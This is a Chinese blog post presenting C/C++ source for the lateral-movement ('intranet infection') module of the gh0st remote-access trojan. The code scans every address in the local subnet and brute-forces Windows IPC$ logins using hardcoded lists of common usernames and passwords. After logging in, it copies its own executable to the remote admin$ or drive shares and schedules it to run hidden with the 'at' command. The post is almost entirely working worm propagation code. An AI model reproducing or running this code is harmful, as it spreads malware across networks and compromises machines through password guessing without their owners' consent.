gh0st学习之内网感染模块

发布时间:April 26, 2015 // 分类:VC/C/C++,windows // No Comments

char *GetMyFilePath();
DWORD SendFiles(const char *RemoteIP,const char *lpUserName,const char *lpPassword);
//----------------------------------------------------------------
typedef DWORD(WINAPI*tWNetAddConnection2)
(
 LPNETRESOURCE lpNetResource,      // connection details
 LPCTSTR      lpPassword,           // 密码
 LPCTSTR       lpUsername,           // 用户名
 DWORD         dwFlags               // 连接选项
);
//----------------------------------------------------------------
int InitWSA()
{
    WORD wVersion =0 ;
    int  errret = -1;
    WSADATA wsaData;
    wVersion = MAKEWORD(2,2);
    errret = WSAStartup(wVersion,&wsaData);
    if( LOBYTE( wsaData.wVersion) != 2 ||
        HIBYTE( wsaData.wVersion) !=2 )
    {
        return 0;
    }
    return 1;
}
 
 
 
 
int nCount;
int breakipc=0;
 
//--------------------------------------------------------------------------------------------
 
DWORD WINAPI IPC(LPVOID lpParameter)  //IPC内网传播
{
    //要进入的用户名
char *szUser[]={                          
"administrator","test","admin", "guest","alex", "home",
"love","xp", "user","game", "123","nn","root",
"movie","time", "yeah","money", "xpuser","hack","enter",
0};
        //要进入的密码
char *szPass[]={
"", 
"password","111","123456","qwerty","test","abc123", "memory",
"home", "12345678","love","bbbbbb","xp", "88888","nn","root","caonima",
"5201314", "1314520","asdfgh","alex", "angel","NULL",
"123", "asdf","baby","woaini", "movie",
0};
//---------------------------------
if(!InitWSA()) //初始化套接字
return 0;
CHAR szHostName[128]={0};   //定义主机名的变量   
struct hostent * pHost;      
int b;                      //定义变量i
SOCKADDR_IN saddr;
             
if(gethostname(szHostName,128)==0) //获取本机计算机名
{        
pHost = gethostbyname(szHostName); //根据计算机名获取IP地址等信息
for(b = 0; pHost!= NULL && pHost->h_addr_list[b]!= NULL; b++ )     
{   
memset(&saddr,0,sizeof(saddr)); 
memcpy(&saddr.sin_addr.s_addr, pHost->h_addr_list[b], pHost->h_length);         
char szIpaddress[128]={0};
 
for(nCount=1;nCount<254;nCount++)  //C段1-254   
{
    breakipc=0;
memset(szIpaddress,0,128);
sprintf(szIpaddress,               //格式化IP到szIpaddress变量
        "%d.%d.%d.%d",
        saddr.sin_addr.S_un.S_un_b.s_b1,
        saddr.sin_addr.S_un.S_un_b.s_b2,
        saddr.sin_addr.S_un.S_un_b.s_b3,
nCount);
//printf("%s\n",szIpaddress);
for(int i = 0;szUser[i]; i++)      //进行循环从szUser变量中0的位置循环用户名
{
for (int j=0;szPass[j];j++)           //进行循环从szPass变量中0的位置循环密码
{
Sleep(200); 
if (breakipc==1)
{
    break;
}
                        //暂停80毫秒
SendFiles(szIpaddress,szUser[i],szPass[j]); //传递远程主机IP用户名和密码进行种植
//printf("%s\n%s\n%s\n",szIpaddress,szUser[i],szPass[j]);
}           
} 
}
                     
}
}   
WSACleanup();   
return 1;
}
 
//--------------------------------------------------------------------------------------------
 
DWORD SendFiles(const char *RemoteIP,const char *lpUserName,const char *lpPassword)
{
HMODULE hModuleMpr=LoadLibrary("mpr.dll");   //加载网络通信的mpr.dll动态链接库
tWNetAddConnection2 connectipc=(tWNetAddConnection2)GetProcAddress(hModuleMpr,"WNetAddConnection2A");
 
char sPwd[20]={0};
memset(sPwd, 0, 20);
if(!lstrcmp(lpPassword, "NULL"))
sprintf(sPwd, "\"%s\"","");
 
char szCmdLine[1028]={0};
char szIpcFilePath[MAX_PATH]={0};
sprintf(szCmdLine,"\\\\%s\\ipc$",RemoteIP);
NETRESOURCE ns;
ns.dwScope=RESOURCE_GLOBALNET;
ns.dwType=RESOURCETYPE_ANY; 
ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC; 
ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;
ns.lpLocalName="";
ns.lpRemoteName=szCmdLine;
ns.lpProvider=NULL;
ns.lpComment=NULL;
BOOL bRet=TRUE;
DWORD dwRet;
dwRet=connectipc(&ns,lpPassword,lpUserName,0);
 
if (connectipc)
{
 
    char *szMyFilePath=GetMyFilePath();
    Sleep(200);
    memset(szCmdLine,0,1028);
    sprintf(szCmdLine,"\\\\%s\\admin$\\NewArea.exe",RemoteIP);
    lstrcpy(szIpcFilePath,"admin$\\");
    bRet=CopyFile(GetMyFilePath(),szCmdLine,FALSE);
    if(!bRet)
    {
        memset(szCmdLine,0,1028);
        sprintf(szCmdLine,"\\\\%s\\C$\\NewArean.exe",RemoteIP);
        lstrcpy(szIpcFilePath,"C:\\NewArea.exe");
        bRet=CopyFile(GetMyFilePath(),szCmdLine,FALSE);
        if(!bRet)
        {
            memset(szCmdLine,0,1028);
            sprintf(szCmdLine,"\\\\%s\\D$\\NewArea.exe",RemoteIP);
            lstrcpy(szIpcFilePath,"D:\\NewArea.exe");
            bRet=CopyFile(GetMyFilePath(),szCmdLine,FALSE);
             
            if(!bRet)
            {
                memset(szCmdLine,0,1028);
                sprintf(szCmdLine,"\\\\%s\\E$\\NewArea.exe",RemoteIP);
                lstrcpy(szIpcFilePath,"E:\\NewArea.exe");
                bRet=CopyFile(GetMyFilePath(),szCmdLine,FALSE);
                if(!bRet)
                {
                    memset(szCmdLine,0,1028);
                    sprintf(szCmdLine,"\\\\%s\\F$\\NewArea.exe",RemoteIP);
                    lstrcpy(szIpcFilePath,"F:\\NewArea.exe");
                    bRet=CopyFile(GetMyFilePath(),szCmdLine,FALSE);
                    return 0;
                }
            }
        }
    }
    if(bRet)
    {
        SYSTEMTIME sYstemTime;
        GetLocalTime(&sYstemTime);
        memset(szCmdLine,0,1028);
        sprintf(szCmdLine,"at \\\\%s %d:%d %s",RemoteIP,sYstemTime.wHour,sYstemTime.wMinute+2,szIpcFilePath);
        WinExec(szCmdLine,SW_HIDE);
        breakipc=1;
        Sleep(2000);
    }
    return 0;
}
 
     
return 1;
     
}
 
//-----------------------------------------------------------------------------
char *GetMyFilePath()  //得到自身路径函数
{
char szMyFilePath[MAX_PATH]={0};
GetModuleFileName(NULL,szMyFilePath,MAX_PATH);
return szMyFilePath;
}

 

标签:内网感染, IPC传播, 穷举

添加新评论 »

分类
最新文章
最近回复
  • 没穿底裤: 最近发现的新版本可以装在LINUX了。但是API有点变化
  • 没穿底裤: 暂时好像没有看到这个功能.
  • 没穿底裤: 这个只是一个分析,并不是使用方法哟
  • 没穿底裤: 抱歉,很久没有打理了。会不会你使用的是12版本。目前还没有遇到过这种情况
  • bao song: http://0cx.cc/php_decode_shell.jspx 这个怎么用,代码提示...